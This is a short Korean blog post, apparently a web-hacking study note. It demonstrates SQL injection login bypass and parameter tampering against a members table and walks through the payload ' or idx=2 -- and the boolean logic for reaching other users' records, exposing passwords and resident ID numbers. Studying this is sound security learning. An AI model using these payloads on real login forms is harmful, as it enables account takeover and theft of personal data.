Oh! JUN
SQL Injection 공격을 통한 파라미터 변조 공격(취약 사례-1) 본문
idx=2로 우회접속을 할것이다.
select * from members where id='' and password='' or idx=2 -- '
idx=2에 해당하는 id가 session으로 들어간다.
' or idx=2[spacebar]--[spacebar]입력하면
idx에 로그인 되면서 idx, id, password, jumin 정보가 출력된다.
idx에 해당하는 id가 session에 들어간 상태
select * from members where id='$_SESSION["gugucon"]' and idx=2
만약 idx=4로 변경하고 싶다면 어떻게 해야될까?
id는 SESSION 부분으로 건들 수 없어서 id and idx는 버려야된다.
id='' and idx=999 or idx=4
id='' and idx=999 | FALSE | 버려지고 |
id='' and idx=999 or idx=4 | TRUE | idx=4만 남는다. |
*번외*
id='' and idx=2 or idx=4
id='' and idx=2 | TRUE | id='gugucon' 의 idx가 2니까 T |
id='' and idx=2 or idx=4 | TRUE | idx=2와 idx=4 둘다 남는다. |
근데 상위 레코드만 출력되므로 'gugucon'만 출력된다.
'웹 해킹 > SQL Injection' 카테고리의 다른 글
[Acunetix Acuart] SQL Injection 실습 (Error-Based-SQL Injection) (0) | 2022.11.19 |
---|---|
SQL Injection 공격을 통한 파라미터 변조 공격(취약 사례-2) (0) | 2022.11.15 |
5) 보안 솔루션 및 입력 값 검증 우회 기법 (0) | 2022.11.14 |
3) 보안 솔루션 및 입력 값 검증 우회 기법 (0) | 2022.11.14 |
2) 보안 솔루션 및 입력 값 검증 우회 기법 (0) | 2022.11.14 |